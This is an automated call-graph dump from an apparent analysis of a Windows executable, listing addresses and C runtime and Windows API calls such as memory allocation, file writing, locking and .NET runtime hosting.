API calls 7543->7544 7545 3f259b 7544->7545 7545->7530 7548 3f2649 7546->7548 7549 3f2686 7548->7549 7551 3f3e3d 7548->7551 7572 3f3da5 Sleep 7548->7572 7549->7531 7552 3f3e46 7551->7552 7553 3f3e51 7551->7553 7554 3f477c _malloc 58 API calls 7552->7554 7555 3f3e59 7553->7555 7564 3f3e66 7553->7564 7556 3f3e4e 7554->7556 7557 3f1b1f __getptd_noexit 58 API calls 7555->7557 7556->7548 7568 3f3e61 __dosmaperr 7557->7568 7558 3f3e9e 7559 3f493b _malloc DecodePointer 7558->7559 7561 3f3ea4 7559->7561 7560 3f3e6e HeapReAlloc 7560->7564 7560->7568 7562 3f2218 __cftoe_l 58 API calls 7561->7562 7562->7568 7563 3f3ece 7566 3f2218 __cftoe_l 58 API calls 7563->7566 7564->7558 7564->7560 7564->7563 7565 3f493b _malloc DecodePointer 7564->7565 7569 3f3eb6 7564->7569 7565->7564 7567 3f3ed3 GetLastError 7566->7567 7567->7568 7568->7548 7570 3f2218 __cftoe_l 58 API calls 7569->7570 7571 3f3ebb GetLastError 7570->7571 7571->7568 7572->7548 7576 3f4b3b LeaveCriticalSection 7573->7576 7575 3f1bc9 7575->7521 7576->7575 7578 3f126f CorBindToRuntimeEx 7577->7578 7579 3f11cc 7577->7579 7580 3f1292 SysAllocString 7578->7580 7579->7578 7579->7580 7582 3f134b 7580->7582 7583 3f1355 6 API calls 7580->7583 7628 3f1020 7582->7628 7586 3f13c0 7583->7586 7586->7586 7587 3f13cb StrCpyW SafeArrayCreateVector 7586->7587 7612 3f1b16 7587->7612 7589 3f13f9 VariantClear 7591 3f142e SysAllocString 7589->7591 7592 3f1428 7589->7592 7594 3f1471 SafeArrayPutElement VariantClear VariantInit VariantInit SysAllocString 7591->7594 7595 3f1451 7591->7595 7593 3f1020 RaiseException 7592->7593 7593->7591 7596 3f14fd SysFreeString VariantClear 7594->7596 7597 3f14f3 7594->7597 7598 3f1020 RaiseException 7595->7598 7601 3f155a SysAllocString 7596->7601 7602 3f1604 VariantClear 7596->7602 7599 3f1020 RaiseException 7597->7599 7598->7594 7599->7596 7603 3f158d 7601->7603 7604 3f1597 SysFreeString 7601->7604 7609 3f161b 7602->7609 7605 3f1020 RaiseException 7603->7605 7622 3f10a0 VariantInit 7604->7622 7605->7604 7608 3f15cd 7608->7602 7610 3f1b07 __cftoe_l 6 API calls 7609->7610 7611 3f16a1 7610->7611 7611->6743 7611->6744 7614 3f216e 7612->7614 7613 3f477c _malloc 58 API calls 7613->7614 7614->7613 7615 3f2190 7614->7615 7616 3f493b _malloc DecodePointer 7614->7616 7617 3f2194 std::exception::exception 7614->7617 7615->7589 7616->7614 7631 3f496e 7617->7631 7619 3f21be 7634 3f4871 7619->7634 7621 3f21d0 Mailbox 7621->7589 7623 3f10f7 SysAllocString 7622->7623 7624 3f10f2 7622->7624 7623->7624 7625 3f1107 7623->7625 7627 3f113a SysFreeString VariantClear 7624->7627 7626 3f1020 RaiseException 7625->7626 7626->7624 7627->7608 7629 3f496e __CxxThrowException@8 RaiseException 7628->7629 7630 3f1037 7629->7630 7633 3f498d RaiseException 7631->7633 7633->7619 7635 3f4912 7634->7635 7636 3f4923 7635->7636 7637 3f1b1f __getptd_noexit 58 API calls 7635->7637 7636->7621 7637->7636 7641 3f243f 7638->7641 7640 3f22e6 7642 3f244b __initptd 7641->7642 7643 3f49d1 __lock 51 API calls 7642->7643 7644 3f2452 7643->7644 7645 3f250b _doexit 7644->7645 7646 3f2480 DecodePointer 7644->7646 7661 3f2559 7645->7661 7646->7645 7648 3f2497 DecodePointer 7646->7648 7654 3f24a7 7648->7654 7650 3f2568 __initptd 7650->7640 7652 3f24b4 EncodePointer 7652->7654 7653 3f2550 7655 3f22b5 _doexit 3 API calls 7653->7655 7654->7645 7654->7652 7656 3f24c4 DecodePointer EncodePointer 7654->7656 7657 3f2559 7655->7657 7659 3f24d6 DecodePointer DecodePointer 7656->7659 7658 3f2566 7657->7658 7666 3f4b3b LeaveCriticalSection 7657->7666 7658->7640 7659->7654 7662 3f255f 7661->7662 7663 3f2539 7661->7663 7667 3f4b3b LeaveCriticalSection 7662->7667 7663->7650 7665 3f4b3b LeaveCriticalSection 7663->7665 7665->7653 7666->7658 7667->7663 8793 3f2bbd 8794 3f2bf2 8793->8794 8795 3f2bcd 8793->8795 8795->8794 8796 3f4ce8 IsInExceptionSpec 62 API calls 8795->8796 8797 3f2bfd 8796->8797 8800 3f3d97 SetUnhandledExceptionFilter 8797->8800 8799 3f2c08 8800->8799 8235 3f5d78 8242 3f6ef8 8235->8242 8238 3f5d8b 8239 3f1b1f __getptd_noexit 58 API calls 8238->8239 8241 3f5d96 8239->8241 8255 3f6f01 8242->8255 8244 3f5d7d 8244->8238 8245 3f760a 8244->8245 8246 3f7616 __initptd 8245->8246 8247 3f49d1 __lock 58 API calls 8246->8247 8248 3f7622 8247->8248 8249 3f7687 8248->8249 8253 3f765b DeleteCriticalSection 8248->8253 8283 3f81d7 8248->8283 8296 3f769e 8249->8296 8251 3f7693 __initptd 8251->8238 8254 3f1b1f __getptd_noexit 58 API calls 8253->8254 8254->8248 8256 3f6f0d __initptd 8255->8256 8257 3f49d1 __lock 58 API calls 8256->8257 8264 3f6f1c 8257->8264 8258 3f6fba 8273 3f6fdc 8258->8273 8261 3f6fc6 __initptd 8261->8244 8263 3f6e4e 82 API calls __fflush_nolock 8263->8264 8264->8258 8264->8263 8265 3f5dde 8264->8265 8270 3f6fa9 8264->8270 8266 3f5dff EnterCriticalSection 8265->8266 8267 3f5de9 8265->8267 8266->8264 8268 3f49d1 __lock 58 API calls 8267->8268 8269 3f5df2 8268->8269 8269->8264 8276 3f5e48 8270->8276 8272 3f6fb7 8272->8264 8282 3f4b3b LeaveCriticalSection 8273->8282 8275 3f6fe3 8275->8261 8277 3f5e69 LeaveCriticalSection 8276->8277 8278 3f5e56 8276->8278 8277->8272 8281 3f4b3b LeaveCriticalSection 8278->8281 8280 3f5e66 8280->8272 8281->8280 8282->8275 8284 3f81e3 __initptd 8283->8284 8285 3f820f 8284->8285 8286 3f81f7 8284->8286 8292 3f8207 __initptd 8285->8292 8299 3f5d9f 8285->8299 8287 3f2218 __cftoe_l 58 API calls 8286->8287 8289 3f81fc 8287->8289 8291 3f29e1 __cftoe_l 9 API calls 8289->8291 8291->8292 8292->8248 8548 3f4b3b LeaveCriticalSection 8296->8548 8298 3f76a5 8298->8251 8300 3f5daf 8299->8300 8301 3f5dd1 EnterCriticalSection 8299->8301 8300->8301 8303 3f5db7 8300->8303 8302 3f5dc7 8301->8302 8305 3f816b 8302->8305 8304 3f49d1 __lock 58 API calls 8303->8304 8304->8302 8306 3f818e 8305->8306 8307 3f817a 8305->8307 8309 3f818a 8306->8309 8324 3f6e94 8306->8324 8308 3f2218 __cftoe_l 58 API calls 8307->8308 8311 3f817f 8308->8311 8321 3f8246 8309->8321 8313 3f29e1 __cftoe_l 9 API calls 8311->8313 8313->8309 8317 3f81a8 8341 3f88db 8317->8341 8319 3f81ae 8319->8309 8320 3f1b1f __getptd_noexit 58 API calls 8319->8320 8320->8309 8541 3f5e0e 8321->8541 8323 3f824c 8323->8292 8325 3f6ea7 8324->8325 8326 3f6ecb 8324->8326 8325->8326 8327 3f6dd6 __fflush_nolock 58 API calls 8325->8327 8330 3f8a50 8326->8330 8328 3f6ec4 8327->8328 8367 3f77c5 8328->8367 8331 3f81a2 8330->8331 8332 3f8a5d 8330->8332 8334 3f6dd6 8331->8334 8332->8331 8333 3f1b1f __getptd_noexit 58 API calls 8332->8333 8333->8331 8335 3f6df5 8334->8335 8336 3f6de0 8334->8336 8335->8317 8337 3f2218 __cftoe_l 58 API calls 8336->8337 8338 3f6de5 8337->8338 8339 3f29e1 __cftoe_l 9 API calls 8338->8339 8340 3f6df0 8339->8340 8340->8317 8342 3f88e7 __initptd 8341->8342 8343 3f890b 8342->8343 8344 3f88f4 8342->8344 8346 3f8996 8343->8346 8348 3f891b 8343->8348 8345 3f21e4 __free_osfhnd 58 API calls 8344->8345 8347 3f88f9 8345->8347 8349 3f21e4 __free_osfhnd 58 API calls 8346->8349 8351 3f2218 __cftoe_l 58 API calls 8347->8351 8352 3f8939 8348->8352 8353 3f8943 8348->8353 8350 3f893e 8349->8350 8356 3f2218 __cftoe_l 58 API calls 8350->8356 8363 3f8900 __initptd 8351->8363 8354 3f21e4 __free_osfhnd 58 API calls 8352->8354 8355 3f827b ___lock_fhandle 59 API calls 8353->8355 8354->8350 8357 3f8949 8355->8357 8358 3f89a2 8356->8358 8359 3f895c 8357->8359 8360 3f8967 8357->8360 8361 3f29e1 __cftoe_l 9 API calls 8358->8361 8513 3f89b6 8359->8513 8364 3f2218 __cftoe_l 58 API calls 8360->8364 8361->8363 8363->8319 8365 3f8962 8364->8365 8528 3f898e 8365->8528 8368 3f77d1 __initptd 8367->8368 8369 3f77de 8368->8369 8370 3f77f5 8368->8370 8395 3f21e4 8369->8395 8372 3f7894 8370->8372 8375 3f7809 8370->8375 8373 3f21e4 __free_osfhnd 58 API calls 8372->8373 8376 3f782c 8373->8376 8378 3f7827 8375->8378 8379 3f7831 8375->8379 8382 3f2218 __cftoe_l 58 API calls 8376->8382 8377 3f2218 __cftoe_l 58 API calls 8390 3f77ea __initptd 8377->8390 8381 3f21e4 __free_osfhnd 58 API calls 8378->8381 8398 3f827b 8379->8398 8381->8376 8384 3f78a0 8382->8384 8383 3f7837 8385 3f785d 8383->8385 8386 3f784a 8383->8386 8387 3f29e1 __cftoe_l 9 API calls 8384->8387 8389 3f2218 __cftoe_l 58 API calls 8385->8389 8407 3f78b4 8386->8407 8387->8390 8392 3f7862 8389->8392 8390->8326 8391 3f7856 8466 3f788c 8391->8466 8393 3f21e4 __free_osfhnd 58 API calls 8392->8393 8393->8391 8396 3f2eb4 __getptd_noexit 58 API calls 8395->8396 8397 3f21e9 8396->8397 8397->8377 8399 3f8287 __initptd 8398->8399 8400 3f82d6 EnterCriticalSection 8399->8400 8401 3f49d1 __lock 58 API calls 8399->8401 8402 3f82fc __initptd 8400->8402 8404 3f82ac 8401->8404 8402->8383 8403 3f82c4 8469 3f8300 8403->8469 8404->8403 8405 3f3a9e ___lock_fhandle InitializeCriticalSectionAndSpinCount 8404->8405 8405->8403 8408 3f78c1 __write_nolock 8407->8408 8409 3f791f 8408->8409 8410 3f7900 8408->8410 8454 3f78f5 8408->8454 8415 3f7977 8409->8415 8416 3f795b 8409->8416 8412 3f21e4 __free_osfhnd 58 API calls 8410->8412 8411 3f1b07 __cftoe_l 6 API calls 8413 3f8115 8411->8413 8414 3f7905 8412->8414 8413->8391 8418 3f2218 __cftoe_l 58 API calls 8414->8418 8419 3f7990 8415->8419 8473 3f8467 8415->8473 8417 3f21e4 __free_osfhnd 58 API calls 8416->8417 8420 3f7960 8417->8420 8421 3f790c 8418->8421 8482 3f6dfa 8419->8482 8424 3f2218 __cftoe_l 58 API calls 8420->8424 8425 3f29e1 __cftoe_l 9 API calls 8421->8425 8427 3f7967 8424->8427 8425->8454 8426 3f799e 8428 3f7cf7 8426->8428 8432 3f2e9c ___InternalCxxFrameHandler 58 API calls 8426->8432 8431 3f29e1 __cftoe_l 9 API calls 8427->8431 8429 3f808a WriteFile 8428->8429 8430 3f7d15 8428->8430 8433 3f7cea GetLastError 8429->8433 8447 3f7cb7 8429->8447 8434 3f7d2b 8430->8434 8435 3f7e39 8430->8435 8431->8454 8436 3f79ca GetConsoleMode 8432->8436 8433->8447 8439 3f7d9a WriteFile 8434->8439 8443 3f80c3 8434->8443 8434->8447 8452 3f7f2e 8435->8452 8453 3f7e44 8435->8453 8436->8428 8438 3f7a09 8436->8438 8437 3f7a19 GetConsoleCP 8437->8443 8461 3f7a48 8437->8461 8438->8428 8438->8437 8439->8433 8439->8434 8440 3f2218 __cftoe_l 58 API calls 8441 3f80f1 8440->8441 8449 3f21e4 __free_osfhnd 58 API calls 8441->8449 8442 3f7e17 8444 3f80ba 8442->8444 8445 3f7e22 8442->8445 8443->8440 8443->8454 8494 3f21f7 8444->8494 8450 3f2218 __cftoe_l 58 API calls 8445->8450 8446 3f7fa3 WideCharToMultiByte 8446->8433 8446->8452 8447->8442 8447->8443 8447->8454 8448 3f7ea9 WriteFile 8448->8433 8448->8453 8449->8454 8455 3f7e27 8450->8455 8452->8443 8452->8446 8452->8447 8456 3f7ff2 WriteFile 8452->8456 8453->8443 8453->8447 8453->8448 8454->8411 8457 3f21e4 __free_osfhnd 58 API calls 8455->8457 8456->8452 8459 3f8045 GetLastError 8456->8459 8457->8454 8459->8452 8460 3f85cf 60 API calls __write_nolock 8460->8461 8461->8433 8461->8447 8461->8460 8462 3f7b31 WideCharToMultiByte 8461->8462 8464 3f85e7 WriteConsoleW CreateFileW __putwch_nolock 8461->8464 8465 3f7bc6 WriteFile 8461->8465 8491 3f8456 8461->8491 8462->8447 8463 3f7b6c WriteFile 8462->8463 8463->8433 8463->8461 8464->8461 8465->8433 8465->8461 8512 3f83f6 LeaveCriticalSection 8466->8512 8468 3f7892 8468->8390 8472 3f4b3b LeaveCriticalSection 8469->8472 8471 3f8307 8471->8400 8472->8471 8499 3f838f 8473->8499 8475 3f8477 8476 3f847f 8475->8476 8477 3f8490 SetFilePointerEx 8475->8477 8480 3f2218 __cftoe_l 58 API calls 8476->8480 8478 3f84a8 GetLastError 8477->8478 8479 3f8484 8477->8479 8481 3f21f7 __dosmaperr 58 API calls 8478->8481 8479->8419 8480->8479 8481->8479 8483 3f6e05 8482->8483 8485 3f6e12 8482->8485 8484 3f2218 __cftoe_l 58 API calls 8483->8484 8486 3f6e0a 8484->8486 8487 3f6e1e 8485->8487 8488 3f2218 __cftoe_l 58 API calls 8485->8488 8486->8426 8487->8426 8489 3f6e3f 8488->8489 8490 3f29e1 __cftoe_l 9 API calls 8489->8490 8490->8486 8492 3f841c __isleadbyte_l 58 API calls 8491->8492 8493 3f8463 8492->8493 8493->8461 8495 3f21e4 __free_osfhnd 58 API calls 8494->8495 8496 3f2200 __dosmaperr 8495->8496 8497 3f2218 __cftoe_l 58 API calls 8496->8497 8498 3f2213 8497->8498 8498->8454 8500 3f839a 8499->8500 8504 3f83af 8499->8504 8501 3f21e4 __free_osfhnd 58 API calls 8500->8501 8503 3f839f 8501->8503 8502 3f21e4 __free_osfhnd 58 API calls 8505 3f83de 8502->8505 8506 3f2218 __cftoe_l 58 API calls 8503->8506 8504->8502 8507 3f83d4 8504->8507 8508 3f2218 __cftoe_l 58 API calls 8505->8508 8509 3f83a7 8506->8509 8507->8475 8510 3f83e6 8508->8510 8509->8475 8511 3f29e1 __cftoe_l 9 API calls 8510->8511 8511->8509 8512->8468 8514 3f838f __commit 58 API calls 8513->8514 8517 3f89c4 8514->8517 8515 3f8a1a 8531 3f8309 8515->8531 8517->8515 8520 3f838f __commit 58 API calls 8517->8520 8526 3f89f8 8517->8526 8518 3f838f __commit 58 API calls 8521 3f8a04 CloseHandle 8518->8521 8522 3f89ef 8520->8522 8521->8515 8523 3f8a10 GetLastError 8521->8523 8525 3f838f __commit 58 API calls 8522->8525 8523->8515 8524 3f21f7 __dosmaperr 58 API calls 8527 3f8a44 8524->8527 8525->8526 8526->8515 8526->8518 8527->8365 8540 3f83f6 LeaveCriticalSection 8528->8540 8530 3f8994 8530->8363 8532 3f8375 8531->8532 8533 3f8315 8531->8533 8534 3f2218 __cftoe_l 58 API calls 8532->8534 8533->8532 8538 3f833e 8533->8538 8535 3f837a 8534->8535 8536 3f21e4 __free_osfhnd 58 API calls 8535->8536 8537 3f8366 8536->8537 8537->8524 8537->8527 8538->8537 8539 3f8360 SetStdHandle 8538->8539 8539->8537 8540->8530 8542 3f5e1d 8541->8542 8543 3f5e3c LeaveCriticalSection 8541->8543 8542->8543 8544 3f5e24 8542->8544 8543->8323 8547 3f4b3b LeaveCriticalSection 8544->8547 8546 3f5e39 8546->8323 8547->8546 8548->8298 7764 3fc4b7 7767 3fc6a3 7764->7767 7766 3fc4bf 7768 3fc6ec 7767->7768 7769 3fc6b3 7767->7769 7768->7766 7769->7768 7770 3f2e9c ___InternalCxxFrameHandler 58 API calls 7769->7770 7771 3fc6df 7770->7771 7771->7766 7712 3fd235 7713 3f1b07 __cftoe_l 6 API calls 7712->7713 7714 3fd249 7713->7714 7715 3f1b07 __cftoe_l 6 API calls 7714->7715 7716 3fd253 7715->7716 8549 3fcf75 8552 3fcea6 8549->8552 8553 3fcecb 8552->8553 8554 3fceb6 8552->8554 8555 3f2e9c ___InternalCxxFrameHandler 58 API calls 8553->8555 8554->8553 8557 3f2e9c ___InternalCxxFrameHandler 58 API calls 8554->8557 8559 3fceea 8554->8559 8556 3fcedc 8555->8556 8558 3f2e9c ___InternalCxxFrameHandler 58 API calls 8556->8558 8556->8559 8557->8553 8558->8559 8801 3fc3b5 8802 3f4ce8 IsInExceptionSpec 62 API calls 8801->8802 8803 3fc3bd __initptd 8801->8803 8802->8803 7772 3f16b0 7773 3f16b9 7772->7773 7774 3f16e7 SetEvent 7772->7774 7776 3f16be 7773->7776 7777 3f16d5 SetEvent 7773->7777 7775 3f16f2 7774->7775 7776->7775 7778 3f16c3 SetEvent 7776->7778 7843 3f26f0 7844 3f271a 7843->7844 7845 3f2727 7843->7845 7846 3f1b07 __cftoe_l 6 API calls 7844->7846 7847 3f1b07 __cftoe_l 6 API calls 7845->7847 7846->7845 7851 3f2737 __except_handler4 7847->7851 7848 3f284f 7849 3f2804 __except_handler4 7849->7848 7850 3f283f 7849->7850 7852 3f1b07 __cftoe_l 6 API calls 7849->7852 7853 3f1b07 __cftoe_l 6 API calls 7850->7853 7851->7848 7851->7849 7855 3f278e __IsNonwritableInCurrentImage 7851->7855 7852->7850 7853->7848 7861 3f5892 RtlUnwind 7855->7861 7856 3f2866 7858 3f1b07 __cftoe_l 6 API calls 7856->7858 7857 3f27cc __except_handler4 7857->7856 7859 3f1b07 __cftoe_l 6 API calls 7857->7859 7860 3f2876 __except_handler4 7858->7860 7859->7856 7862 3f58a6 7861->7862 7862->7857 8560 3fd170 8561 3f1b07 __cftoe_l 6 API calls 8560->8561 8562 3fd181 8561->8562 8804 3f3fb0 IsProcessorFeaturePresent 8805 3f3fd6 8804->8805 8809 3f6ff0 RtlUnwind 7779 3f48af 7782 3f4912 7779->7782 7781 3f48c0 Mailbox 7783 3f491b 7782->7783 7784 3f4923 7782->7784 7785 3f1b1f __getptd_noexit 58 API calls 7783->7785 7784->7781 7785->7784 8140 3f1f2f 8141 3f1f3e 8140->8141 8142 3f1f44 8140->8142 8143 3f2389 _abort 58 API calls 8141->8143 8144 3f1f49 __initptd 8142->8144 8146 3f22e7 8142->8146 8143->8142 8147 3f243f _doexit 58 API calls 8146->8147 8148 3f22f2 8147->8148 8148->8144 7745 3f626a 7746 3f22cb __lock 58 API calls 7745->7746 7747 3f6271 7746->7747 8563 3f2d67 8565 3f2d73 __initptd 8563->8565 8564 3f2d8c 8566 3f2d9b 8564->8566 8569 3f1b1f __getptd_noexit 58 API calls 8564->8569 8565->8564 8567 3f2e7b __initptd 8565->8567 8568 3f1b1f __getptd_noexit 58 API calls 8565->8568 8570 3f2daa 8566->8570 8571 3f1b1f __getptd_noexit 58 API calls 8566->8571 8568->8564 8569->8566 8572 3f2db9 8570->8572 8573 3f1b1f __getptd_noexit 58 API calls 8570->8573 8571->8570 8574 3f2dc8 8572->8574 8576 3f1b1f __getptd_noexit 58 API calls 8572->8576 8573->8572 8575 3f2dd7 8574->8575 8577 3f1b1f __getptd_noexit 58 API calls 8574->8577 8578 3f2de6 8575->8578 8579 3f1b1f __getptd_noexit 58 API calls 8575->8579 8576->8574 8577->8575 8580 3f2df8 8578->8580 8581 3f1b1f __getptd_noexit 58 API calls 8578->8581 8579->8578 8582 3f49d1 __lock 58 API calls 8580->8582 8581->8580 8585 3f2e00 8582->8585 8583 3f2e23 8595 3f2e87 8583->8595 8585->8583 8587 3f1b1f __getptd_noexit 58 API calls 8585->8587 8587->8583 8588 3f49d1 __lock 58 API calls 8592 3f2e37 ___removelocaleref 8588->8592 8591 3f1b1f __getptd_noexit 58 API calls 8591->8567 8593 3f5a40 ___freetlocinfo 58 API calls 8592->8593 8594 3f2e68 8592->8594 8593->8594 8598 3f2e93 8594->8598 8601 3f4b3b LeaveCriticalSection 8595->8601 8597 3f2e30 8597->8588 8602 3f4b3b LeaveCriticalSection 8598->8602 8600 3f2e75 8600->8591 8601->8597 8602->8600 7748 3f8864 7749 3f886c __cfltcvt_init 7748->7749 7750 3f8877 7749->7750 7752 3fa7ea 7749->7752 7758 3fb01f 7752->7758 7754 3fa7fd 7755 3fa804 7754->7755 7756 3f29f1 __invoke_watson 8 API calls 7754->7756 7755->7750 7757 3fa810 7756->7757 7759 3fb03b __control87 7758->7759 7762 3fb05b __control87 7758->7762 7760 3f2218 __cftoe_l 58 API calls 7759->7760 7761 3fb051 7760->7761 7763 3f29e1 __cftoe_l 9 API calls 7761->7763 7762->7754 7763->7762 8149 3fa723 8152 3fa734 8149->8152 8153 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8152->8153 8154 3fa746 8153->8154 8161 3fabb1 8154->8161 8156 3fa752 8157 3fa766 8156->8157 8166 3faa43 8156->8166 8159 3fabb1 __forcdecpt_l 65 API calls 8157->8159 8160 3fa730 8159->8160 8162 3fabcf 8161->8162 8163 3fabbd 8161->8163 8171 3faa6e 8162->8171 8163->8156 8167 3faa4f 8166->8167 8168 3faa60 8166->8168 8167->8156 8193 3fa9f1 8168->8193 8172 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8171->8172 8173 3faa81 8172->8173 8174 3faaed 8173->8174 8175 3faa8d 8173->8175 8176 3fab0b 8174->8176 8190 3f841c 8174->8190 8182 3faaa2 8175->8182 8183 3f862a 8175->8183 8178 3f2218 __cftoe_l 58 API calls 8176->8178 8180 3fab11 8176->8180 8178->8180 8181 3f6c58 ___crtLCMapStringA 62 API calls 8180->8181 8181->8182 8182->8156 8184 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8183->8184 8185 3f863c 8184->8185 8186 3f841c __isleadbyte_l 58 API calls 8185->8186 8189 3f8649 8185->8189 8187 3f866d 8186->8187 8188 3f6d96 ___crtGetStringTypeA 61 API calls 8187->8188 8188->8189 8189->8182 8191 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8190->8191 8192 3f842d 8191->8192 8192->8176 8194 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8193->8194 8195 3faa02 8194->8195 8196 3f862a __isctype_l 61 API calls 8195->8196 8197 3faa19 8195->8197 8196->8197 8197->8156 8810 3f1ddf 8813 3f1db3 8810->8813 8812 3f1dea Mailbox 8816 3f2b4c 8813->8816 8815 3f1dbf 8815->8812 8817 3f2b58 __initptd 8816->8817 8818 3f49d1 __lock 58 API calls 8817->8818 8822 3f2b5f 8818->8822 8820 3f2b90 8823 3f1b1f __getptd_noexit 58 API calls 8820->8823 8821 3f2baa __initptd 8821->8815 8822->8820 8824 3f1b1f __getptd_noexit 58 API calls 8822->8824 8825 3f2b99 8822->8825 8823->8825 8824->8820 8826 3f2bb4 8825->8826 8829 3f4b3b LeaveCriticalSection 8826->8829 8828 3f2bbb 8828->8821 8829->8828 7863 3fccdb 7864 3f4ce8 IsInExceptionSpec 62 API calls 7863->7864 7865 3fcce3 7864->7865 8198 3f1f1b 8201 3f2c0c 8198->8201 8202 3f2eb4 __getptd_noexit 58 API calls 8201->8202 8203 3f1f2c 8202->8203 8204 3f8119 8205 3f8125 __initptd 8204->8205 8206 3f815c __initptd 8205->8206 8207 3f49d1 __lock 58 API calls 8205->8207 8208 3f8139 8207->8208 8209 3f5cba __updatetlocinfoEx_nolock 58 API calls 8208->8209 8210 3f8149 8209->8210 8212 3f8162 8210->8212 8215 3f4b3b LeaveCriticalSection 8212->8215 8214 3f8169 8214->8206 8215->8214 7866 3f4cd8 7867 3f4cdb 7866->7867 7868 3f4ce8 IsInExceptionSpec 62 API calls 7867->7868 7869 3f4ce7 __initptd 7868->7869 7870 3f2e9c ___InternalCxxFrameHandler 58 API calls 7869->7870 7871 3f4cf9 7870->7871 7872 3f6273 _abort 62 API calls 7871->7872 7873 3f4d1b 7872->7873 7874 3f2e9c ___InternalCxxFrameHandler 58 API calls 7873->7874 7875 3f4d21 7874->7875 8603 3f1b57 8604 3f25b3 __calloc_crt 58 API calls 8603->8604 8605 3f1b61 EncodePointer 8604->8605 8606 3f1b7a 8605->8606 7789 3fce96 7791 3fce9e __initptd 7789->7791 7792 3f4ce8 7789->7792 7793 3f4cf4 __initptd 7792->7793 7794 3f2e9c ___InternalCxxFrameHandler 58 API calls 7793->7794 7795 3f4cf9 7794->7795 7800 3f6273 7795->7800 7811 3f4d4d DecodePointer 7800->7811 7802 3f6278 7803 3f6283 7802->7803 7812 3f4d76 7802->7812 7805 3f62ab 7803->7805 7806 3f628d IsProcessorFeaturePresent 7803->7806 7807 3f2389 _abort 58 API calls 7805->7807 7808 3f6298 7806->7808 7809 3f62b5 7807->7809 7810 3f2884 __call_reportfault 7 API calls 7808->7810 7810->7805 7811->7802 7815 3f4d82 __initptd 7812->7815 7813 3f4dec 7814 3f4dc9 DecodePointer 7813->7814 7819 3f4dfb 7813->7819 7820 3f4db8 _siglookup 7814->7820 7815->7813 7815->7814 7816 3f4db3 7815->7816 7822 3f4daf 7815->7822 7817 3f2eb4 __getptd_noexit 58 API calls 7816->7817 7817->7820 7821 3f2218 __cftoe_l 58 API calls 7819->7821 7824 3f4e59 7820->7824 7826 3f2389 _abort 58 API calls 7820->7826 7832 3f4dc1 __initptd 7820->7832 7823 3f4e00 7821->7823 7822->7816 7822->7819 7825 3f29e1 __cftoe_l 9 API calls 7823->7825 7827 3f49d1 __lock 58 API calls 7824->7827 7829 3f4e64 7824->7829 7825->7832 7826->7824 7827->7829 7828 3f4ec6 EncodePointer 7830 3f4e99 7828->7830 7829->7828 7829->7830 7833 3f4ef7 7830->7833 7832->7803 7834 3f4efb 7833->7834 7835 3f4f02 7833->7835 7837 3f4b3b LeaveCriticalSection 7834->7837 7835->7832 7837->7835 8216 3fbf14 8217 3f1b07 __cftoe_l 6 API calls 8216->8217 8218 3fbf26 8217->8218 8219 3fcfcd ___InternalCxxFrameHandler 66 API calls 8218->8219 8220 3fbf3f 8219->8220 7838 3f1090 VariantClear 7876 3f1acf DeleteCriticalSection 7877 3f1ae5 7876->7877 7878 3f1af4 7877->7878 7879 3f1b1f __getptd_noexit 58 API calls 7877->7879 7879->7878 8221 3f4d0c 8222 3f4d0f 8221->8222 8223 3f6273 _abort 62 API calls 8222->8223 8224 3f4d1b 8223->8224 8225 3f2e9c ___InternalCxxFrameHandler 58 API calls 8224->8225 8226 3f4d21 8225->8226 8607 3f9d4c 8610 3f9d6d 8607->8610 8609 3f9d68 8611 3f9d78 8610->8611 8612 3f9dd7 8610->8612 8611->8612 8614 3f9d7d 8611->8614 8678 3fa2be 8612->8678 8615 3f9d9b 8614->8615 8616 3f9d82 8614->8616 8617 3f9dbe 8615->8617 8619 3f9da5 8615->8619 8624 3fa478 8616->8624 8665 3f9df3 8617->8665 8643 3fa539 8619->8643 8623 3f9dbc 8623->8609 8695 3fae8f 8624->8695 8627 3fa4bd 8630 3fa4d5 8627->8630 8631 3fa4c5 8627->8631 8628 3fa4ad 8629 3f2218 __cftoe_l 58 API calls 8628->8629 8632 3fa4b2 8629->8632 8707 3fad17 8630->8707 8633 3f2218 __cftoe_l 58 API calls 8631->8633 8635 3f29e1 __cftoe_l 9 API calls 8632->8635 8636 3fa4ca 8633->8636 8639 3fa4b9 8635->8639 8637 3f29e1 __cftoe_l 9 API calls 8636->8637 8637->8639 8638 3fa508 8638->8639 8716 3fa38c 8638->8716 8641 3f1b07 __cftoe_l 6 API calls 8639->8641 8642 3f9d96 8641->8642 8642->8609 8644 3fae8f __fltout2 58 API calls 8643->8644 8645 3fa567 8644->8645 8646 3fa56e 8645->8646 8647 3fa581 8645->8647 8650 3f2218 __cftoe_l 58 API calls 8646->8650 8648 3fa59c 8647->8648 8649 3fa589 8647->8649 8654 3fad17 __fptostr 58 API calls 8648->8654 8651 3f2218 __cftoe_l 58 API calls 8649->8651 8652 3fa573 8650->8652 8653 3fa58e 8651->8653 8655 3f29e1 __cftoe_l 9 API calls 8652->8655 8656 3f29e1 __cftoe_l 9 API calls 8653->8656 8657 3fa5c8 8654->8657 8658 3fa57a 8655->8658 8656->8658 8657->8658 8660 3fa60e 8657->8660 8663 3fa5e8 8657->8663 8659 3f1b07 __cftoe_l 6 API calls 8658->8659 8662 3fa634 8659->8662 8736 3fa16d 8660->8736 8662->8623 8664 3fa38c __cftof2_l 58 API calls 8663->8664 8664->8658 8666 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8665->8666 8667 3f9e18 8666->8667 8668 3f9e2f 8667->8668 8669 3f9e38 8667->8669 8670 3f2218 __cftoe_l 58 API calls 8668->8670 8672 3f9e41 8669->8672 8675 3f9e55 8669->8675 8671 3f9e34 8670->8671 8674 3f29e1 __cftoe_l 9 API calls 8671->8674 8673 3f2218 __cftoe_l 58 API calls 8672->8673 8673->8671 8677 3f9e50 _memset __alldvrm __cftoa_l _strrchr 8674->8677 8675->8677 8768 3fa14f 8675->8768 8677->8623 8679 3fae8f __fltout2 58 API calls 8678->8679 8680 3fa2f0 8679->8680 8681 3fa307 8680->8681 8682 3fa2f7 8680->8682 8683 3fa30e 8681->8683 8684 3fa318 8681->8684 8685 3f2218 __cftoe_l 58 API calls 8682->8685 8686 3f2218 __cftoe_l 58 API calls 8683->8686 8689 3fad17 __fptostr 58 API calls 8684->8689 8687 3fa2fc 8685->8687 